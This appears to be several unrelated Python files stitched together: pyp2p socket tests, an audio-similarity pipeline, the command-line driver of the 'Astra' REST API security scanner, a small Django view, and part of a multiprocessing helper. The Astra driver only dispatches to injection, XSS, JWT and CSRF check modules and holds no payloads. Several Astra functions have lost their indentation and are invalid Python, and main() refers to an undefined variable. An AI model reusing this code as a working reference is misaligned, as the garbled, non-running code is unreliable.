        req += "Accept-Language: en-US,en;q=0.5\r\n"
        req += "Accept-Encoding: gzip, deflate\r\n"
        req += "Connection: keep-alive\r\n"
        req += "Content-Type: application/x-www-form-urlencoded\r\n"
        # The +5 accounts for the "test=" form prefix appended below.
        req += "Content-Length: %d\r\n\r\n" % (len(content) + 5)
        req += "test="  # Hence the extra + 5.
        return req

    def build_content(self, upload_size):
        # Deterministic payload so the server-side hash is reproducible.
        content = b"8" * upload_size
        return content
def simple_server():
    """Accept a single connection on localhost:9000, hold it for ~2 seconds,
    then shut everything down.  Used as a throwaway test peer.

    Fix: the accepted client socket was previously never closed (only the
    listener was), leaking a file descriptor; a try/finally now guarantees
    the listener is closed even if bind/accept raises.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind(('localhost', 9000))
        s.listen(0)
        (clientsocket, address) = s.accept()
        time.sleep(2)
        clientsocket.close()
    finally:
        s.close()
class TestSock(TestCase):
    """Integration tests for pyp2p's Sock wrapper.

    Most tests hit live hosts (www.example.com, a mirror, the rendezvous
    servers), so they require network access and are inherently timing
    dependent.
    """

    def test_http_upload_post(self):
        # 100 KB POST upload exercised through SockUpload.
        SockUpload(1000 * 100)

    def test_http_download(self):
        # 1 MB download with a known MD5, via SockDownload.
        SockDownload(
            "http://mirror.internode.on.net/pub/test/1meg.test",
            "e6527b4d5db05226f40f9f2e7750abfb",
            1000000
        )

    def test_blocking_mode(self):
        # The underlying socket timeout must be consistent with the
        # Sock.blocking flag for every constructor combination.
        x = Sock()
        blocking = x.s.gettimeout()
        if x.blocking:
            assert(blocking >= 1 or blocking is None)
        else:
            assert(blocking == 0.0)
        x.close()
        x = Sock(blocking=1)
        blocking = x.s.gettimeout()
        if x.blocking:
            assert(blocking >= 1 or blocking is None)
        else:
            assert(blocking == 0.0)
        x.close()
        x = Sock("www.example.com", 80, timeout=10)
        blocking = x.s.gettimeout()
        if x.blocking:
            assert(blocking >= 1 or blocking is None)
        else:
            assert(blocking == 0.0)
        x.close()
        x = Sock("www.example.com", 80, blocking=1, timeout=10)
        blocking = x.s.gettimeout()
        if x.blocking:
            assert(blocking >= 1 or blocking is None)
        else:
            assert(blocking == 0.0)
        x.close()

    def test_blocking_timeout(self):
        # A blocking recv_line with timeout=1 must not take anywhere near
        # 4 seconds to return.
        client = RendezvousClient(nat_type="preserving",
                                  rendezvous_servers=rendezvous_servers)
        s = client.server_connect()
        t = time.time()
        s.recv_line(timeout=1)
        if time.time() - t >= 4:
            print("Manual timeout failed.")
            assert 0
        s.close()

    def test_non_blocking_timeout(self):
        # Non-blocking reads on an idle connection return empty strings
        # immediately instead of raising.
        client = RendezvousClient(nat_type="preserving",
                                  rendezvous_servers=rendezvous_servers)
        s = client.server_connect()
        assert(s.recv_line() == u"")
        assert(s.recv(1) == u"")
        s.close()

    def test_encoding(self):
        # encoding="ascii" yields bytes (py3) / str (py2);
        # encoding="unicode" yields str (py3) / unicode (py2).
        client = RendezvousClient(nat_type="preserving",
                                  rendezvous_servers=rendezvous_servers)
        s = client.server_connect()
        s.send_line("SOURCE TCP 50")
        ret = s.recv(1, encoding="ascii")
        if sys.version_info >= (3, 0, 0):
            assert(type(ret) == bytes)
        else:
            assert(type(ret) == str)
        assert(ret == b"R")
        ret = s.recv_line()
        assert(u"EMOTE" in ret)
        s.send_line("SOURCE TCP 50")
        ret = s.recv(1, encoding="unicode")
        if sys.version_info >= (3, 0, 0):
            assert(type(ret) == str)
        else:
            assert(type(ret) == unicode)
        s.close()

    def test_0000001_sock(self):
        # Broad smoke test: rendezvous protocol, non-blocking and blocking
        # HTTP round-trips, reconnect, and the internal parse_buf/reply
        # machinery.  The numeric name makes it sort (and hence run) first.
        client = RendezvousClient(nat_type="preserving",
                                  rendezvous_servers=rendezvous_servers)
        s = client.server_connect()
        assert s.connected
        s.send_line("SOURCE TCP 323")
        assert s.connected
        line = s.recv_line()
        assert ("REMOTE" in line)
        s = Sock("www.example.com", 80, blocking=0, timeout=10)
        data = "GET / HTTP/1.1\r\n"
        data += "Connection: close\r\n"
        data += "Host: www.example.com\r\n\r\n"
        s.send(data, send_all=1)
        replies = ""
        while s.connected:
            for reply in s:
                # Output should be unicode.
                if sys.version_info >= (3, 0, 0):
                    assert (type(reply) == str)
                else:
                    assert (type(reply) == unicode)
                replies += reply
                print(reply)
        assert (s.connected != 1)
        assert (replies != "")
        s.close()
        s.reconnect()
        s.close()
        s = Sock("www.example.com", 80, blocking=1, timeout=10)
        s.send_line("GET / HTTP/1.1")
        s.send_line("Host: www.example.com\r\n")
        line = s.recv_line()
        print(line)
        print(type(line))
        print(s.buf)
        print(type(s.buf))
        # NOTE(review): assert on a tuple is always truthy - this line
        # (and the two below using the same pattern) never actually
        # compares anything.
        assert (line, "HTTP/1.1 200 OK")
        if sys.version_info >= (3, 0, 0):
            assert (type(line) == str)
        else:
            assert (type(line) == unicode)
        s.close()
        # parse_buf: split a raw byte buffer into CRLF-terminated lines,
        # leaving any trailing partial line in the buffer.
        s = Sock()
        s.buf = b"\r\nx\r\n"
        x = s.parse_buf()
        assert (x[0] == "x")
        s.buf = b"\r\n"
        x = s.parse_buf()
        assert (x == [])
        s.buf = b"\r\n\r\n"
        x = s.parse_buf()
        assert (x == [])
        s.buf = b"\r\r\n\r\n"
        x = s.parse_buf()
        assert (x[0] == "\r")
        s.buf = b"\r\n\r\n\r\nx"
        x = s.parse_buf()
        assert (x == [])
        s.buf = b"\r\n\r\nx\r\nsdfsdfsdf\r\n"
        x = s.parse_buf()
        assert (x[0] == "x" and x[1] == "sdfsdfsdf")
        s.buf = b"sdfsdfsdf\r\n"
        s.parse_buf()
        s.buf += b"abc\r\n"
        x = s.parse_buf()
        assert (x[0] == "abc")
        s.buf += b"\r\ns\r\n"
        x = s.parse_buf()
        assert (x[0] == "s")
        s.buf = b"reply 1\r\nreply 2\r\n"
        s.replies = []
        s.update()
        assert (s.pop_reply(), "reply 1")
        assert (s.replies[0], "reply 2")

    def test_keep_alive(self):
        # Exercise set_keep_alive under each OS code path by monkey
        # patching platform.system.
        old_system = platform.system
        # NOTE(review): the loop variable shadows the imported os module
        # for the rest of this method.
        for os in ["Darwin", "Windows", "Linux"]:
            def system_wrapper():
                return os
            platform.system = system_wrapper
            sock = Sock()
            # Sock option error - not supported on this OS.
            try:
                sock.set_keep_alive(sock.s)
            except socket.error as e:
                valid_errors = (10042, 22)
                if e.errno not in valid_errors:
                    raise e
            except AttributeError:
                pass
            sock.close()
        platform.system = old_system
        assert 1

    def test_non_default_iface(self):
        # Binding to a (probably nonexistent) interface must fail cleanly.
        sock = Sock(interface="eth12")
        try:
            sock.connect("www.example.com", 80, timeout=10)
        except (TypeError, socket.error) as e:
            pass
        sock.close()
        assert 1

    def test_ssl(self):
        # Same non-blocking HTTP round-trip as test_0000001_sock, but over
        # TLS (port 443, use_ssl=1).
        s = Sock(
            "www.example.com",
            443,
            blocking=0,
            timeout=10,
            use_ssl=1
        )
        data = "GET / HTTP/1.1\r\n"
        data += "Connection: close\r\n"
        data += "Host: www.example.com\r\n\r\n"
        s.send(data, send_all=1)
        replies = ""
        while s.connected:
            for reply in s:
                # Output should be unicode.
                if sys.version_info >= (3, 0, 0):
                    assert (type(reply) == str)
                else:
                    assert (type(reply) == unicode)
                replies += reply
                print(reply)
        assert (s.connected != 1)
        assert (replies != "")

    def test_ssl_blocking_error(self):
        # get_chunks on an idle TLS connection must not raise in either
        # blocking mode.
        # Blocking.
        s = Sock(
            "www.example.com",
            443,
            blocking=1,
            timeout=2,
            use_ssl=1,
            debug=1
        )
        s.get_chunks()
        s.close()
        # Non-blocking.
        s = Sock(
            "www.example.com",
            443,
            blocking=0,
            timeout=2,
            use_ssl=1,
            debug=1
        )
        s.get_chunks()
        s.close()

    def test_decoding_error(self):
        # Downloading binary data with encoding="unicode" must not crash
        # (hash checking is skipped).
        SockDownload(
            "http://mirror.internode.on.net/pub/test/1meg.test",
            expected_hash=None,
            file_size=1000,
            blocking=0,
            encoding="unicode"
        )

    def test_broken_send_con(self):
        # Can't monkey patch socket on Linux.
        # NOTE(review): this compares the platform.system *function object*
        # to a string, so the condition is always true and the test always
        # returns early - probably meant platform.system().
        if platform.system != "Windows":
            return
        port = 10121
        server = ThreadingSimpleServer(('', port), SimpleHTTPRequestHandler)
        sock = Sock("127.0.0.1", port, debug=1, timeout=6)
        server.server_close()
        print(sock.send(b"test"))
        sock.close()
        server = ThreadingSimpleServer(('', port), SimpleHTTPRequestHandler)
        def close_server():
            time.sleep(1)
            server.server_close()
        sock = Sock("127.0.0.1", port, debug=1, timeout=6)
        Thread(target=close_server).start()
        for i in range(0, 5):
            print(sock.send(b"test"))
            time.sleep(0.5)
        # NOTE(review): missing parentheses - this references the bound
        # method without calling it, so the socket is never closed here.
        sock.close
        # Simulate send timeout!
        sock = Sock(debug=1, blocking=1)
        def raise_timeout():
            time.sleep(1)
            original_send = sock.s.send
            def fake_send(data):
                raise socket.timeout("timed out")
            sock.s.send = fake_send
            time.sleep(1)
            sock.s.send = original_send
        Thread(target=raise_timeout).start()
        sock.connect("www.example.com", 80)
        # You want to fill up the entire networking buffer
        # so that it times out without the needed recv.
        buf_size = sock.s.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF) + 1
        buf_size *= 2
        sock.chunk_size = buf_size
        total = 0
        for i in range(0, 4):
            x = sock.send(b"x" * buf_size)
            total += x
            if x < buf_size:
                break
        time.sleep(2.2)
        sock.close()
        # Test broken connection.
        sock = Sock(debug=1, blocking=1)
        def raise_timeout():
            time.sleep(1)
            original_send = sock.s.send
            def fake_send(data):
                return 0
            sock.s.send = fake_send
            time.sleep(1)
        Thread(target=raise_timeout).start()
        sock.connect("www.example.com", 80)
        # You want to fill up the entire networking buffer
        # so that it times out without the needed recv.
        x = 1
        timeout = time.time() + 10
        while x and time.time() < timeout:
            x = sock.send(b"x")
        time.sleep(2.2)
        sock.close()

    def test_magic(self):
        # Exercise the container dunders Sock exposes over its reply list
        # (__len__, __getitem__, __setitem__, __delitem__, __reversed__).
        sock = Sock()
        sock.replies = ["a", "b", "c"]
        assert(len(sock) == 3)
        assert(sock[0] == "a")
        del sock[0]
        assert(sock[0] == "b")
        sock[0] = "x"
        assert(sock[0] == "x")
        y = list(reversed(sock))
        assert(y == ["x", "c"])
|
main.py | import os
import time
import sys
from itertools import chain
from core.db import Db
from core.util import sha256sum, scale, progress, sum_n
from core.thread import StartThread
from core.extractor import get_all_features, get_distance
class Main:
    """Driver for the audio-similarity pipeline: feature extraction,
    pairwise distance computation, persistence, and an interactive
    similarity browser.

    Fixes applied: ``factors == None`` -> ``is None``; ``ind is 10``
    identity comparison on an int -> ``== 10`` (identity of small ints is a
    CPython implementation detail and raises a SyntaxWarning on 3.8+);
    negative menu indices are now rejected instead of silently indexing
    from the end of the list; ``endswith`` now takes a tuple of suffixes.
    """

    def __init__(self, db_name):
        """
        Constructor for Main class.

        Parameters
        ----------
        db_name : str
            Database file name, resolved relative to the project root.

        Attributes
        ----------
        audio_path : location of audio files
        db : database class object
        """
        # Go through README.md to see which database to use
        _database_name = db_name
        _audio_folder_name = 'audio_resources'
        _root_dir_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../'))
        _db_file = os.path.join(_root_dir_path, _database_name)
        self.audio_path = os.path.join(_root_dir_path, _audio_folder_name)
        self.db = Db(storage_file=_db_file)

    def calc_feature_new(self):
        """
        Loop through the audio_resources folder, calculate features of each
        track and the distance between them, then save the distances to the
        database.  Newer batch-oriented variant of calc_feature().
        """
        start_time = time.time()
        if not self.db.create_tables():
            print('Problem in creating tables')
            return
        file_list, file_list_size = self._get_files_from_folder()
        # if there is no file in audio_resources, no point in going forward
        if file_list_size == 0:
            return
        print('Checking if already present in db...')
        val = self.db.get_all_names()
        if len(val) == 0:
            print('Database is empty')
            to_be_processed = file_list
        else:
            # check if file is already processed in database
            to_be_processed = self._not_present_in_db(file_list=file_list)
        # if all files are already processed, then exit this and show similarities
        if len(to_be_processed) == 0:
            return
        print()
        # calculate the features of all the files
        features = self._calculate_features(files=to_be_processed)
        print()
        # calculate the distances between all the features
        dist = self._calulate_distances(features=features)
        print()
        # save the distances in the distance table
        self._save_dist_to_db_new(distances=dist)
        print()
        finish_time = time.time() - start_time
        if finish_time > 120:
            print('Done! Took %.2f minutes to complete' % (finish_time / 60))
        else:
            print('Done! Took %.2f seconds to complete' % finish_time)

    def calc_feature(self):
        """
        Older, pairwise-threaded variant: for each unprocessed pair of
        tracks, compute features in worker threads and save the distance
        to the database as soon as both features are ready.
        """
        start_time = time.time()
        if not self.db.create_tables():
            print('Problems in creating tables')
            return
        # loop over the directory
        file_list, file_list_size = self._get_files_from_folder()
        processed_file_list = []
        # `processing` is True once a distance-saving thread exists; it is
        # only read after dist_thread has been assigned.
        processing = False
        total_prog = sum_n(file_list_size + 1)
        curr_prog = 0
        print('Processing...')
        # start progress bar in console
        progress(curr_prog)
        i = 0
        while i < file_list_size:
            ifile = file_list[i]
            # get audios
            if ifile not in processed_file_list:
                ipath = os.path.join(self.audio_path, ifile)
                update_ifile = True
                processed_file_list.append(ifile)
                ifile_sha = sha256sum(ipath)
                j = i + 1
                while j < file_list_size:
                    jfile = file_list[j]
                    jpath = os.path.join(self.audio_path, jfile)
                    jfile_sha = sha256sum(jpath)
                    # check if their hash is already present in the distance table
                    if self.db.is_hashes_present(ifile_sha, jfile_sha):
                        j += 1
                        continue
                    else:
                        # if not, calculate features and distances and save to db
                        if update_ifile:
                            ithread = StartThread(target=get_all_features, args=(ipath,))
                            ithread.start()
                        jthread = StartThread(target=get_all_features, args=(jpath,))
                        jthread.start()
                        if update_ifile:
                            ifeature = ithread.join()
                            update_ifile = False
                            curr_prog += 1
                            progress(scale(0, total_prog, curr_prog))
                        jfeature = jthread.join()
                        if processing:  # distances can be calculated until the next features are calculated
                            dist_thread.join()
                        dist_thread = StartThread(target=self._save_dist_to_db, args=(ifeature, jfeature,))
                        dist_thread.start()
                        curr_prog += 1
                        progress(scale(0, total_prog, curr_prog))
                        processing = True
                    j += 1
            i += 1
        if processing:
            dist_thread.join()
            message = 'Done! Took %.0f seconds to calculate features and distances between ' % (
                time.time() - start_time) + str(file_list_size) + ' files'
        else:
            message = 'Data collected from database'
        progress(1)
        print()
        print(message)

    def show_similarity(self):
        """
        Gets the data from database and shows the similarity between the
        tracks via an interactive console menu.
        """
        names = self._get_names_from_db()
        factors = self.db.get_all_distances()
        if factors is None:
            print('Audio_resources folder and the database is empty!')
            return
        if len(factors) == 0:
            print('Nothing to show')
            return
        names.sort()
        # Pre-compute the raw distance sum of each pair for min/max scaling.
        sum_list = []
        for fact in factors:
            sum_list.append(fact[2] + fact[3] + fact[4] + fact[5] + fact[6] + fact[7])
        min_val = min(sum_list)
        max_val = max(sum_list)
        while True:
            print()
            # Printing name of files from the database
            for i, name in enumerate(names):
                print(' %-30s ' % (str(i + 1) + '. ' + name), end='')
                if (i + 1) % 3 == 0:
                    print()
            print()
            # Getting a file number
            try:
                val = int(input('Select a track number(0 to exit)...'))
            except ValueError as e:
                print('Enter a valid number, Press enter to continue')
                input()
                continue
            if val == 0:
                break
            elif val > len(names) or val < 0:
                # Negative values previously slipped through and indexed
                # from the end of the list.
                print('Enter a valid number, Press enter to continue')
                input()
                continue
            print()
            selected_track = names[val - 1]
            print('Top 10 tracks closest to:', selected_track, ' are:')
            result = []
            for index, factor in enumerate(factors):
                scaled_sum = scale(rmin=min_val, rmax=max_val, val=sum_list[index])
                if factor[0] == selected_track:
                    result.append((factor[1], 100 * (1 - scaled_sum)))
                elif factor[1] == selected_track:
                    result.append((factor[0], 100 * (1 - scaled_sum)))
            # Sorting the list according to maximum similarity
            result.sort(key=lambda tup: tup[1], reverse=True)
            for ind, val in enumerate(result):
                # Printing top 10 results
                if ind == 10:
                    break
                print('%2d. %-30s - %.1f %%' % (ind + 1, val[0], val[1]))
            print('-------------------------------------------------')
            x = input('Press Enter to continue or 0 to exit...')
            if x == '0':
                break
            print()

    # method used in older calc_feature
    def _save_dist_to_db(self, ifeature, jfeature):
        """Compute the distance between two features and persist it."""
        dist = get_distance(ifeature, jfeature)
        self.db.save_feature_distances(dist)

    def _get_names_from_db(self):
        """Return the de-duplicated list of track names stored in the db."""
        names_db = self.db.get_all_names()
        tup_to_list = list(chain.from_iterable(names_db))
        names = list(set(tup_to_list))
        return names

    def _get_files_from_folder(self):
        """Return (file_list, count) of .mp3/.wav files in audio_path."""
        file_list = []
        for file in os.listdir(self.audio_path):
            if file.endswith(('.mp3', '.wav')):
                file_list.append(file)
        return file_list, len(file_list)

    def _not_present_in_db(self, file_list):
        """
        Checks if files present in audio_resources are not yet processed in
        the database.
        :param file_list: list of files in audio_resources folder
        :return to_be_processed: list of files which are in audio_resources and not yet processed
        """
        to_be_processed = []
        size = len(file_list)
        total_prog = sum_n(size + 1)
        curr_prog = 0
        progress(0)
        for i, ifile in enumerate(file_list):
            ifile_sha = sha256sum(os.path.join(self.audio_path, ifile))
            j = i + 1
            while j < size:
                jfile = file_list[j]
                jfile_sha = sha256sum(os.path.join(self.audio_path, jfile))
                if ifile not in to_be_processed and not self.db.is_hashes_present(ifile_sha, jfile_sha):
                    to_be_processed.append(ifile)
                curr_prog += 1
                progress(scale(0, total_prog, curr_prog))
                j += 1
        progress(1)
        return to_be_processed

    def _calculate_features(self, files):
        """Extract the feature set of every file, with a progress bar."""
        print('Calculating features...')
        features = []
        total_prog = len(files)
        curr_prog = 0
        for file in files:
            progress(percent=scale(0, total_prog, curr_prog), name=file)
            features.append(get_all_features(os.path.join(self.audio_path, file)))
            curr_prog += 1
        progress(1)
        return features

    # NOTE: name keeps its historical typo ("calulate") for compatibility.
    def _calulate_distances(self, features):
        """Compute the pairwise distances between all features."""
        print('Calculating distances...')
        dist = []
        size = len(features)
        total_prog = sum_n(size)
        curr_prog = 0
        for i, ifeature in enumerate(features):
            j = i + 1
            while j < size:
                jfeature = features[j]
                progress(percent=scale(0, total_prog, curr_prog), name=ifeature.name + ' <==> ' + jfeature.name)
                dist.append(get_distance(ifeature, jfeature))
                curr_prog += 1
                j += 1
        progress(1)
        return dist

    def _save_dist_to_db_new(self, distances):
        """Persist every not-yet-stored distance record."""
        print('Saving to DB...')
        total_prog = len(distances)
        curr_prog = 0
        progress(curr_prog)
        for dist in distances:
            if self.db.is_hashes_present(dist.hash1, dist.hash2):
                continue
            self.db.save_feature_distances(dist)
            curr_prog += 1
            progress(scale(0, total_prog, curr_prog))
        progress(1)
|
astra.py | import argparse
import base64
import json
import requests
import time
import ast
import utils.logger as logger
import utils.logs as logs
import urlparse
from core.zapscan import *
from core.parsers import *
from utils.logger import *
from core.login import APILogin
from utils.logger import logger
from utils.config import update_value,get_value,get_allvalues
from modules.cors import cors_main
from modules.auth import auth_check
from modules.rate_limit import rate_limit
from modules.csrf import csrf_check
from modules.jwt_attack import jwt_check
from modules.sqli import sqli_check
from modules.xss import xss_check
from modules.redirect import open_redirect_check
from core.zap_config import zap_start
from multiprocessing import Process
from utils.db import Database_update
dbupdate = Database_update()
def parse_collection(collection_name,collection_type):
    # Dispatch the collection file to the matching parser; only Postman
    # collections are supported, anything else aborts the program.
    # NOTE(review): `sys` is not imported in this module's visible import
    # list - presumably provided by a wildcard import; verify.
    if collection_type == 'Postman':
        parse_data.postman_parser(collection_name)
    else:
        print "[-]Failed to Parse collection"
        sys.exit(1)
def add_headers(headers):
    """Merge the stored auth cookie (and any configured custom headers)
    into *headers* and return it.

    :param headers: dict of HTTP headers; mutated in place.
    :return: the same dict, updated.
    """
    cookie = get_value('config.property','login','auth')
    cookie_dict = ast.literal_eval(cookie)
    cookie_header = {'Cookie': cookie_dict['cookie']}
    headers.update(cookie_header)
    try:
        custom_header = get_value('config.property','login','headers')
        custom_header = ast.literal_eval(custom_header)
        headers.update(custom_header)
    except Exception:
        # Custom headers are optional: any lookup/parse failure means none
        # are configured.  (Was a bare `except:`, which also swallowed
        # SystemExit and KeyboardInterrupt.)
        pass
    return headers
def generate_report():
    # Generating report once the scan is complete.
    # NOTE(review): `api_scan` is never defined at module scope - it is
    # only a local inside modules_scan() - so calling this function as
    # written raises NameError.
    result = api_scan.generate_report()
    if result is True:
        print "%s[+]Report is generated successfully%s"% (api_logger.G, api_logger.W)
    else:
        print "%s[-]Failed to generate a report%s"% (api_logger.R, api_logger.W)
def read_scan_policy():
try:
scan_policy = get_value('scan.property','scan-policy','attack')
attack = ast.literal_eval(scan_policy)
except Exception as e:
print e
print "Failed to parse scan property file."
return attack
def update_scan_status(scanid, module_name=None, count=None):
    #Update scanning status and total scan of module into DB.
    # When `count` is given, record the total number of modules to run;
    # otherwise mark `module_name` as completed ("Y").
    # NOTE(review): the 3s sleep presumably waits for the scan record to
    # exist before updating it - confirm against Database_update.
    time.sleep(3)
    if count is not None:
        dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {"total_scan" : count}})
    else:
        dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {module_name : "Y"}})
def modules_scan(url,method,headers,body,scanid=None):
    '''Scanning API using different engines '''
    # Each engine runs only if its flag in the scan policy is 'Y'/'y'.
    # NOTE(review): direct key access (attack['zap'], attack['cors'], ...)
    # raises KeyError if the policy file omits a key.
    attack = read_scan_policy()
    if attack is None:
        print "Failed to start scan."
        sys.exit(1)
    if scanid is not None:
        # Record how many modules will run for this scan id.
        count = 0
        for key,value in attack.items():
            if value == 'Y' or value =='y':
                count += 1
        update_scan_status(scanid,"",count)
    if attack['zap'] == "Y" or attack['zap'] == "y":
        api_scan = zap_scan()
        status = zap_start()
        if status is True:
            api_scan.start_scan(url,method,headers,body,scanid)
    # Custom modules scan
    if attack['cors'] == 'Y' or attack['cors'] == 'y':
        cors_main(url,method,headers,body,scanid)
        update_scan_status(scanid, "cors")
    if attack['Broken auth'] == 'Y' or attack['Broken auth'] == 'y':
        auth_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "auth")
    if attack['Rate limit'] == 'Y' or attack['Rate limit'] == 'y':
        rate_limit(url,method,headers,body,scanid)
        update_scan_status(scanid, "Rate limit")
    if attack['csrf'] == 'Y' or attack['csrf'] == 'y':
        csrf_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "csrf")
    if attack['jwt'] == 'Y' or attack['jwt'] == 'y':
        jwt_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "jwt")
    if attack['sqli'] == 'Y' or attack['sqli'] == 'y':
        sqli_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "sqli")
    if attack['xss'] == 'Y' or attack['xss'] == 'y':
        xss_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "xss")
    if attack['open-redirection'] == 'Y' or attack['open-redirection'] == 'y':
        open_redirect_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "open-redirection")
def validate_data(url, method):
    ''' Validate HTTP request data and return boolean value'''
    # A request is valid when the verb is one we support and the URL has a
    # scheme (http/https/...).
    allowed_methods = ['GET', 'POST', 'DEL', 'OPTIONS', 'PUT']
    parsed = urlparse.urlparse(url)
    return method in allowed_methods and bool(parsed.scheme)
def scan_single_api(url, method, headers, body, api, scanid=None):
    ''' This function deals with scanning a single API. '''
    if headers is None or headers == '':
        headers = {'Content-Type' : 'application/json'}
    try:
        # Convert header and body in dict format
        if type(headers) is not dict:
            headers = ast.literal_eval(headers)
        if body:
            if type(body) is not dict:
                body = ast.literal_eval(body)
    except:
        # Malformed header/body strings abort the scan.
        return False
    if method == '':
        method = 'GET'
    result = validate_data(url, method)
    if result is False:
        print "[-]Invalid Arguments"
        return False
    # Run the scan engines in a separate process so the caller (e.g. the
    # web UI) is not blocked.
    p = Process(target=modules_scan,args=(url,method,headers,body,scanid),name='module-scan')
    p.start()
    if api == "Y":
        return True
def scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require):
''' Scan API through different engines '''
scanid = ''
if collection_type and collection_name is not None:
parse_collection(collection_name,collection_type)
if login_require is True:
api_login.verify_login(parse_data.api_lst)
msg = True
for data in parse_data.api_lst:
try:
url = data['url']['raw']
except:
url = data['url']
headers,method,body = data['headers'],data['method'],''
if headers:
try:
headhers = add_headers(headers)
except:
pass
if data['body'] != '':
body = json.loads(base64.b64decode(data['body']))
modules_scan(url,method,headers,body,scanid)
else:
print "%s [-]Invalid Collection. Please recheck collection Type/Name %s" %(api_logger.G, api_logger.W)
#generate_report()
def get_arg(args=None):
    # Parse CLI arguments and return them as a 9-tuple consumed by main().
    parser = argparse.ArgumentParser(description='Astra - REST API Security testing Framework')
    parser.add_argument('-c', '--collection_type',
                        help='Type of API collection',
                        default='Postman')
    parser.add_argument('-n', '--collection_name',
                        help='Type of API collection')
    parser.add_argument('-u', '--url',
                        help='URL of target API')
    parser.add_argument('-headers', '--headers',
                        help='Custom headers.Example: {"token" : "123"}')
    parser.add_argument('-method', '--method',
                        help='HTTP request method',
                        default='GET',choices=('GET', 'POST', 'PUT','DELETE'))
    parser.add_argument('-b', '--body',
                        help='Request body of API')
    parser.add_argument('-l', '--loginurl',
                        help='URL of login API')
    parser.add_argument('-H', '--loginheaders',
                        help='Headers should be in a dictionary format. Example: {"accesstoken" : "axzvbqdadf"}')
    parser.add_argument('-d', '--logindata',
                        help='login data of API')
    # NOTE(review): there is no --loginmethod option here, yet main()
    # reads a `loginmethod` variable - see the note in main().
    results = parser.parse_args(args)
    if len(args) == 0:
        print "%sAt least one argument is needed to procced.\nFor further information check help: %spython astra.py --help%s"% (api_logger.R, api_logger.G, api_logger.W)
        sys.exit(1)
    return (results.collection_type,
            results.collection_name,
            results.url,
            results.headers,
            results.method,
            results.body,
            results.loginurl,
            results.loginheaders,
            results.logindata,
            )
def main():
collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata = get_arg(sys.argv[1:])
if loginheaders is None:
loginheaders = {'Content-Type' : 'application/json'}
if collection_type and collection_name and loginurl and loginmethod and logindata:
# Login data is given as an input.
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and loginurl:
# This will first find the given loginurl from collection and it will fetch auth token.
parse_collection(collection_name,collection_type)
try:
loginurl,lognheaders,loginmethod,logidata = api_login.parse_logindata(loginurl)
except:
print "[-]%s Failed to detect login API from collection %s " %(api_logger.R, api_logger.W)
sys.exit(1)
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif loginurl and loginmethod:
api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
login_require = False
elif collection_type and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url and collection_name and headers:
#Custom headers
update_value('login','header',headers)
login_require = False
elif url:
if headers is None:
headers = {'Content-Type' : 'application/json'}
if method is None:
method = "GET"
login_require = False
else:
login_require = True
if body:
body = ast.literal_eval(body)
# Configuring ZAP before starting a scan
get_auth = get_value('config.property','login','auth_type')
if collection_type and collection_name is not None:
scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require)
else:
scan_single_api(url, method, headers, body, "False")
if __name__ == '__main__':
    # Wire up the module-level collaborators used throughout this file,
    # print the banner, then run the CLI.
    api_login = APILogin()
    parse_data = PostmanParser()
    api_logger = logger()
    api_logger.banner()
    main()
views.py | from django.shortcuts import render
from django.http import HttpResponse
import os
import time
import threading
#def detached(argc, argv):
def show(request):
    """Render the notepad index page.

    The commented-out background-thread experiment that previously lived
    here was dead code and has been removed.
    """
    return render(request, 'notepad/index.html')
|
mp.py | # coding: utf8
"""
并行计算模块
原理:
并行版本的实现说明:
1 标准生产者\消费者模型
2 生产者处于线程中, 将任务迭代器的内容写入任务队列中,并置结束标志
3 消费者多个进程, 读取task_queue的内容, 并返回result到done_queue中
4 主线程监控done_queue的内容, 并插入数据库(保持gInst的事务), 直到整个任务结束
"""
from multiprocessing import Process, Queue, current_process, cpu_count
import threading
import traceback
#from shangjie.utils import traceback2
def mp_start( n , iter , callback ):
    """
    Multi-process execution API (producer/consumer model).

    Parameters:
        n         number of worker processes; 0 means auto-detect the CPU
                  count and create N-1 workers (minimum 1).
        iter      task iterable (list, tuple, or generator).  Every item
                  must be a (func, args, kwargs) tuple.
                  Note: func must be a module-level function, otherwise it
                  cannot be called inside a child process, and its first
                  parameter receives the worker index.
        callback  called as callback(worker_idx, result) for each task
                  result; when falsy, results are discarded.
    Returns:
        None.
    Usage:
        Call from the main thread with the task iterator and callback
        prepared; blocks until every task has completed.
    """
    # Decide how many worker processes to spawn.
    if n == 0:
        n = cpu_count() - 1
    if n == 0:
        n = 1
    # Work queue and result queue shared with the worker processes.
    task_queue = Queue()
    done_queue = Queue()
    # Start the consumers first so they are waiting for work.
    subs = []
    for i in range(n):
        p = Process( target=worker, args=( i , task_queue , done_queue ) )
        subs.append( p )
        p.daemon = False
        p.start()
    try:
        # Start the producer thread that feeds task_queue.
        # NOTE(review): Thread(...).start() returns None, so `t` is always
        # None; harmless because it is never used afterwards.
        import threading
        t = threading.Thread( target = publisher , args= ( n , iter , task_queue ) ).start()
        # Drain results until every worker has sent its STOP (or EXCEPT)
        # sentinel; any recorded exception is re-raised after draining.
        stops = 0
        ex = False
        while stops < n:
            result = done_queue.get()
            if result == 'STOP':
                stops += 1
            elif type( result ) is tuple and result[0] == 'EXCEPT':
                stops += 1
                ex = result[1]
            elif result and callable( callback ):
                callback( *result )
        if ex:
            raise RuntimeError( "并行处理时,子进程发生异常:\n%s" % ex )
    finally:
        # Reap every worker process.
        for p in subs:
            p.join()
def publisher( n , iter , task_queue ):
    """
    Producer: validate each task from *iter* and push it onto task_queue.

    Runs in its own thread because *iter* may be a generator yielding very
    many items.  Regardless of errors, n 'STOP' sentinels are always sent
